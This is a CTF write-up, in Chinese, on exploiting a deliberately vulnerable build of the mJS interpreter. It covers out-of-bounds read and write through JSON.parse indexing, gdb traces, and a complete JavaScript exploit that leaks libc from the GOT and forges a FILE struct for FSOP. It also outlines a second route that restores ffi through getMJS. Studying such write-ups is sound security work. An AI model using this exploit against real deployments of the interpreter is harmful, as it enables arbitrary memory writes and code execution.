请教个问题,我调用getMJS()后,返回的是foreign_ptr@555555781260 (一个foreign类型的指针),那么我如何得到这个地址的值,我尝试了各种类型转换都没成功
比赛期间时间没来得及,赛后解出。
题如其名,是个小型的js解释器。最近出现了不少讲javascript的帖子,下文将讲述作为一个初学者的我是如何一步步分析这题目的。
准备
题目给出了目标binary,除了canary其余保护全开,另外还给出了编译方法。
This is a vulnerable software. I patched some of the vulnerabilities, but I think you can still find a way to exploit it, right? Prove it.
If you want to build the chall by yourself, plz type the following commands
git clone https://github.com/cesanta/mjs
cd mjs
git reset --hard fd0bf16
patch -p1 < ../diff.patch
cd mjs && make
按照上述命令编译,发现出来的binary不一致,可能是编译器或者链接库版本差异导致。目前不考虑这个问题,我们自行编译的好处是可以保留符号方便调试。虽然题目的makefile里设置了-g的编译参数,但实际上binary被strip过了。
漏洞分析
现在程序有了如何找漏洞?这玩意儿代码量看起来也不小。
15708 ./mjs.c
1462 ./frozen/frozen.c
538 ./mjs/src/mjs_gc.c
60 ./mjs/src/mjs_main.c
1179 ./mjs/src/mjs_exec.c
148 ./mjs/src/mjs_bcode.c
254 ./mjs/src/mjs_tok.c
160 ./mjs/src/mjs_primitive.c
...
38482 total
github issue
既然题目给了github,不妨看看github的issue。
这个提交者看起来就是出题人,可以从issue标题中看出一些信息。其中空指针解引用之类的BUG我们不感兴趣。而Attribute address read in function getprop_builtin_foreign()
和OOB access in the function getprop_builtin_foreign()
值得注意,但点开发现出题人把issue的内容删掉了。
回头看看题目提供的diff.patch,patch了字符串相关函数,删掉了ffi功能、无关痛痒的格式化输出,patch了mjs_next函数。唯独没有处理这个标题中所说的getprop_builtin_foreign
函数。
diff --git a/mjs/src/mjs_exec.c b/mjs/src/mjs_exec.c
index f4d2e70..2bd167d 100644
--- a/mjs/src/mjs_exec.c
+++ b/mjs/src/mjs_exec.c
@@ -875,7 +875,11 @@ MJS_PRIVATE mjs_err_t mjs_execute(struct mjs *mjs, size_t off, mjs_val_t *res) {
size_t retval_pos = mjs_get_int(
mjs, *vptr(&mjs->call_stack,
-1 - CALL_STACK_FRAME_ITEM_RETVAL_STACK_IDX));
- *vptr(&mjs->stack, retval_pos - 1) = mjs_pop(mjs);
+ mjs_val_t tmp = mjs_pop(mjs);
+ if (vptr(&mjs->stack, retval_pos - 1) == NULL){
+ break;
+ }
+ *vptr(&mjs->stack, retval_pos - 1) = tmp;
}
// LOG(LL_INFO, ("AFTER SETRETVAL"));
// mjs_dump(mjs, 0, stdout);
diff --git a/mjs/src/mjs_ffi.c b/mjs/src/mjs_ffi.c
index aff3939..4a09466 100644
--- a/mjs/src/mjs_ffi.c
+++ b/mjs/src/mjs_ffi.c
@@ -40,7 +40,7 @@ struct cbdata {
};
void mjs_set_ffi_resolver(struct mjs *mjs, mjs_ffi_resolver_t *dlsym) {
- mjs->dlsym = dlsym;
+ mjs->dlsym = NULL;
}
static mjs_ffi_ctype_t parse_cval_type(struct mjs *mjs, const char *s,
diff --git a/mjs/src/mjs_object.c b/mjs/src/mjs_object.c
index 3eaf542..f6fbd35 100644
--- a/mjs/src/mjs_object.c
+++ b/mjs/src/mjs_object.c
@@ -251,8 +251,11 @@ mjs_val_t mjs_next(struct mjs *mjs, mjs_val_t obj, mjs_val_t *iterator) {
if (*iterator == MJS_UNDEFINED) {
struct mjs_object *o = get_object_struct(obj);
p = o->properties;
- } else {
- p = ((struct mjs_property *) get_ptr(*iterator))->next;
+ } else {
+ p = ((struct mjs_property *) get_ptr(*iterator));
+ if(p != NULL){
+ p = p->next;
+ }
}
if (p == NULL) {
diff --git a/mjs/src/mjs_string.c b/mjs/src/mjs_string.c
index 65b2e09..70c0214 100644
--- a/mjs/src/mjs_string.c
+++ b/mjs/src/mjs_string.c
@@ -343,6 +343,7 @@ MJS_PRIVATE void mjs_string_index_of(struct mjs *mjs) {
goto clean;
}
str = mjs_get_string(mjs, &mjs->vals.this_obj, &str_len);
+ if (str_len > strlen(str)) goto clean;
if (!mjs_check_arg(mjs, 0, "searchValue", MJS_TYPE_STRING, &substr_v)) {
goto clean;
@@ -455,7 +456,7 @@ MJS_PRIVATE void mjs_mkstr(struct mjs *mjs) {
if (offset_v != MJS_UNDEFINED) {
offset = mjs_get_int(mjs, offset_v);
}
- len = mjs_get_int(mjs, len_v);
+ len = 0;
ret = mjs_mk_string(mjs, ptr + offset, len, copy);
...
POC分析
猜测这里的漏洞仍然存在,但我们不用着急深入代码,可以再看看其他issue。然后注意到HongxuChen也提了很多类似的issue,看起来是libFuzzer弄出来的。
点开发下HongxuChen提供了详细信息和全部的poc,见https://github.com/ntu-sec/pocs/tree/master/mjs-8d847f2/crashes/https://github.com/ntu-sec/pocs/tree/master/mjs-8d847f2/crashes。随便下载一个执行,发现果然crash了。
浏览一下,作者把漏洞类型也标注了,不妨试试read
和write
类型的,很快可以发现https://github.com/ntu-sec/pocs/blob/master/mjs-8d847f2/crashes/read_mjs.c:9644_1.js/https://github.com/ntu-sec/pocs/blob/master/mjs-8d847f2/crashes/read_mjs.c:9644_1.js触发了SIGSEGV。
代码很简单:
let s ;
let o = (s);
let z = JSON.parse[333333333%3333333333] === 'xx'
基本可以确定是JSON.parse[333333333%3333333333]
导致了读内存崩溃,可以试着gdb调一下。
Program received signal SIGSEGV, Segmentation fault. [12/575]
0x0000555555568304 in getprop_builtin_foreign (mjs=0x555555782010, val=18442897249027941072, name=0x555555782860 "74565", name_len=5, res=0x7fffffffd1b0) at src/mjs_exec.c:501
501 *res = mjs_mk_number(mjs, *(ptr + idx));
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────────────
RAX 0x55555556e2d0 (mjs_op_json_parse) ◂— push rbp
RBX 0x0
RCX 0xfff2000000000000
RDX 0x7fffffffce01 ◂— 0x7fffffffce
RDI 0x555555782010 ◂— 0x0
RSI 0x12345
...
───────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────────────────
► 0x555555568304 <getprop_builtin_foreign+132> movzx ecx, byte ptr [rax + rsi]
0x555555568308 <getprop_builtin_foreign+136> cvtsi2sd xmm0, ecx
0x55555556830c <getprop_builtin_foreign+140> call mjs_mk_number <0x555555574ce0>
...
───────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────────────
496
497 if (!isnum) {
498 mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "index must be a number");
499 } else {
500 uint8_t *ptr = (uint8_t *) mjs_get_ptr(mjs, val);
► 501 *res = mjs_mk_number(mjs, *(ptr + idx));
502 }
503 return 1;
504 }
505
这里源码中的ptr对应rax,是一个函数地址,而idx则对应于rsi,而rsi是我随便给的下标0x12345。也就是说这里可以越界读了,并且这里的函数就是前面说的getprop_builtin_foreign
。
而对应的越界写也类似,用JSON.parse[0x12345] = 0x99
即可越界写入。
RAX 0x55555556e2d0 (mjs_op_json_parse) ◂— push rbp [11/651]
RBX 0x0
RCX 0x99
RDX 0x4063200000000099
RDI 0xfff255555556e2d0
RSI 0x12345
...
───────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────────────────────
► 0x555555566e71 <exec_expr+1777> mov byte ptr [rax + rsi], dl
0x555555566e74 <exec_expr+1780> jmp exec_expr+1785 <0x555555566e79>
...
───────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────────────────────────────────────────────────
342 mjs_prepend_errorf(mjs, MJS_TYPE_ERROR,
343 "only number 0 .. 255 can be assigned");
344 val = MJS_UNDEFINED;
345 } else {
346 uint8_t *ptr = (uint8_t *) mjs_get_ptr(mjs, obj);
► 347 *(ptr + ikey) = (uint8_t) ival;
...
此时可以仔细看看代码了。
static int getprop_builtin_foreign(struct mjs *mjs, mjs_val_t val,
const char *name, size_t name_len,
mjs_val_t *res) {
int isnum = 0;
int idx = cstr_to_ulong(name, name_len, &isnum);
if (!isnum) {
mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "index must be a number");
} else {
uint8_t *ptr = (uint8_t *) mjs_get_ptr(mjs, val);
*res = mjs_mk_number(mjs, *(ptr + idx));
}
return 1;
}
从函数名字可以参测是对foreign
类型的对象做get
的操作。
在mjs_builtin.c
中有其他定义,
/*
* Populate JSON.parse() and JSON.stringify()
*/
v = mjs_mk_object(mjs);
mjs_set(mjs, v, "stringify", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_stringify));
mjs_set(mjs, v, "parse", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_parse));
mjs_set(mjs, obj, "JSON", ~0, v);
/*
* Populate Object.create()
*/
v = mjs_mk_object(mjs);
mjs_set(mjs, v, "create", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_create_object));
mjs_set(mjs, obj, "Object", ~0, v);
/*
* Populate numeric stuff
*/
mjs_set(mjs, obj, "NaN", ~0, MJS_TAG_NAN);
mjs_set(mjs, obj, "isNaN", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_isnan));
}
利用
理想计划
上面这些函数也可以用作越界的base,没什么太大的区别。程序开启了Full RelRO,没法做GOT劫持,但我们可以相对地址越界读取GOT表,泄漏出libc,然后写libc。写libc需要知道libc和base的偏移,也就是得知道程序段的绝对地址。再看看程序的数据段上还有什么。
pwndbg> tele 0x555555781000 500
00:0000│ 0x555555781000 (data_start) ◂— 0x0
01:0008│ 0x555555781008 (__dso_handle) ◂— 0x555555781008
02:0010│ 0x555555781010 (cs_log_cur_msg_level) ◂— 0xffffffff
03:0018│ 0x555555781018 (cs_to_hex.hex) —▸ 0x555555579732 ◂— xor byte ptr [rcx], dh
... ↓
05:0028│ 0x555555781028 ◂— 0x0
06:0030│ 0x555555781030 (s_assign_ops) ◂— 0x1e00000005
07:0038│ 0x555555781038 (s_assign_ops+8) ◂— 0x200000001f
08:0040│ 0x555555781040 (s_assign_ops+16) ◂— 0x2400000021 /* '!' */
09:0048│ 0x555555781048 (s_assign_ops+24) ◂— 0x2f0000002e /* '.' */
...
1a:00d0│ 0x5555557810d0 (s_postfix_ops) ◂— 0x1c0000001d
1b:00d8│ 0x5555557810d8 (s_postfix_ops+8) ◂— 0x0
1c:00e0│ 0x5555557810e0 (opcodetostr.names) —▸ 0x55555557bc62 ◂— push r8 /* 'NOP' */
1d:00e8│ 0x5555557810e8 (opcodetostr.names+8) —▸ 0x55555557bc66 ◂— push rdx /* 'DROP' */
...
43:0218│ 0x555555781218 (completed) ◂— 0x0
44:0220│ 0x555555781220 (cs_log_level) ◂— 0x0
45:0228│ 0x555555781228 (cs_log_file) ◂— 0x0
46:0230│ 0x555555781230 (s_file_level) ◂— 0x0
47:0238│ 0x555555781238 ◂— 0x0
48:0240│ 0x555555781240 ◂— 0x0
49:0248│ 0x555555781248 ◂— 0x0
...
可以看到有一些字节码定义的常量,于是我们可以泄漏出程序段基地址。理想中我们可以越界写libc中的函数指针了,但是注意到getprop_builtin_foreign
中idx是个int,而libc和程序段的偏移超出了int范围。所以写libc的计划不可行。
能不能写一些函数指针呢?这时我们继续观察程序数据段,发现没有任何堆指针。
pwndbg> tele 0x555555781200 200
00:0000│ 0x555555781200 (opcodetostr.names+288) —▸ 0x55555557bd93 ◂— pop r15 /* 'BCODE_HDR' */
01:0008│ 0x555555781208 (opcodetostr.names+296) —▸ 0x55555557bd9d ◂— push r10 /* 'ARGS' */
02:0010│ 0x555555781210 (opcodetostr.names+304) —▸ 0x55555557bda2 ◂— push r10 /* 'FOR_IN_NEXT' */
03:0018│ 0x555555781218 (completed) ◂— 0x0
... ↓
回头再看代码发现,各种变量都在栈上,栈地址看起来也是无从泄漏。此时陷入僵局。
FSOP
但想来想去只能从数据段上入手,在IDA中观察发现刚刚忽略了cs_log_level
和cs_log_file
这两个全局变量,而cs_log_file
是FILE *
!
交叉引用发现cs_log_set_file
负责设置变量,但没有其他函数调用它;另外还有cs_log_printf
和cs_log_print_prefix
使用了cs_log_file
。
int cs_log_print_prefix(enum cs_log_level level, const char *file, int ln) {
...
if (level > cs_log_level && s_file_level == NULL) return 0;
...
if (s_file_level != NULL) {
...
}
if (cs_log_file == NULL) cs_log_file = stderr;
cs_log_cur_msg_level = level;
fwrite(prefix, 1, sizeof(prefix), cs_log_file);
...
}
大致逻辑就是判断参数level
和cs_log_level
的大小,大于就返回,小于就输出到cs_log_file
。如果是NULL就把cs_log_file
赋值为stderr
再输出,最终都是调用fwrite
。
程序中有大量调用该函数的地方,
enum的定义如下。
enum cs_log_level {
LL_NONE = -1,
LL_ERROR = 0,
LL_WARN = 1,
LL_INFO = 2,
LL_DEBUG = 3,
LL_VERBOSE_DEBUG = 4,
_LL_MIN = -2,
_LL_MAX = 5,
};
可以看到我们只要调高cs_log_level
即可触发上述函数。在此之前我们可以先控制FILE* cs_log_file
,让它指到数据段后面,再在数据段后面伪造FILE结构体,利用fwrite做FSOP。
本地先对着有符号的程序调,调的差不多了上目标程序,先搞泄漏试着打远程,发现libc不一致,远程是2.27的,这时重新调整一波继续编写即可。
最终代码如下:
function relread(offset) {
let a = [];
let i = 0;
for(i=0; i<8; i++) {
let z = JSON.parse[offset+i];
a[i] = z;
}
let ret = 0;
for(i=0; i<a.length; i++) {
ret += a[i] <<(i<<3);
}
return ret;
}
function relwrite(offset, val) {
let i = 0;
for(i=0; i<8; i++) {
JSON.parse[offset+i] = (val>>(i<<3))&0xff;
}
}
let base = 0x55555556e370;
let got = 0x55555577fef8;
let pnop = 0x5555557800e0;
let code = relread(pnop-base) - 0x27af0;
let tmp = relread(got-base);
let libc = tmp - 0x7f680; //ftell
print(tmp);
print(base);
print(libc);
print(code);
base = code + 0x1a370;
let log_level = code + 0x22c220;
let pfile = code + 0x22c228;
let fake_file_addr = code + 0x22c800;
print(pfile);
print(log_level);
print(fake_file_addr);
let s = [0, 0, 0, 0, 0, 0xffffffffffffffff, 0, 0, (libc+0x1b3e9a-100)/2, 0, 0, 0, 0, 0, 0, 0, 0, code+0x22cc00, 0, 0, 0, 0, 0, 0, 0, 0, 0, libc+4096864, libc+324672, 0];
let i;
for(i=0; i < s.length; i++) {
relwrite(fake_file_addr+8*i-base, s[i]);
}
relwrite(pfile-base, fake_file_addr);
relwrite(log_level-base, 999);
relwrite(log_level-base, 0);
另一条路
请教了大佬,发现我在看JSON.parse
初始化部分代码时忽略了一个重要函数,getMJS
。
void mjs_init_builtin(struct mjs *mjs, mjs_val_t obj) {
mjs_val_t v;
mjs_set(mjs, obj, "global", ~0, obj);
mjs_set(mjs, obj, "load", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_load));
mjs_set(mjs, obj, "print", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_print));
mjs_set(mjs, obj, "ffi", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_ffi_call));
mjs_set(mjs, obj, "ffi_cb_free", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_ffi_cb_free));
mjs_set(mjs, obj, "mkstr", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_mkstr));
mjs_set(mjs, obj, "getMJS", ~0, // here
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_get_mjs));
mjs_set(mjs, obj, "die", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_die));
mjs_set(mjs, obj, "gc", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_do_gc));
...
/*
* Populate JSON.parse() and JSON.stringify()
*/
v = mjs_mk_object(mjs);
mjs_set(mjs, v, "stringify", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_stringify));
mjs_set(mjs, v, "parse", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_parse));
...
这个函数的实现即为mjs_get_mjs
,对应代码:
static void mjs_get_mjs(struct mjs *mjs) {
mjs_return(mjs, mjs_mk_foreign(mjs, mjs));
}
可以看到这里直接把mjs这个核心对象作为foreign返回了。
回顾一下patch中的操作。
void mjs_set_ffi_resolver(struct mjs *mjs, mjs_ffi_resolver_t *dlsym) {
- mjs->dlsym = dlsym;
+ mjs->dlsym = NULL;
}
既然可以通过getMJS
拿到mjs对象,而我们又可以越界读GOT拿到libc地址,所以我们把mjs->dlsym
重新恢复,即可使得ffi
可用,非常简洁明了的利用方法。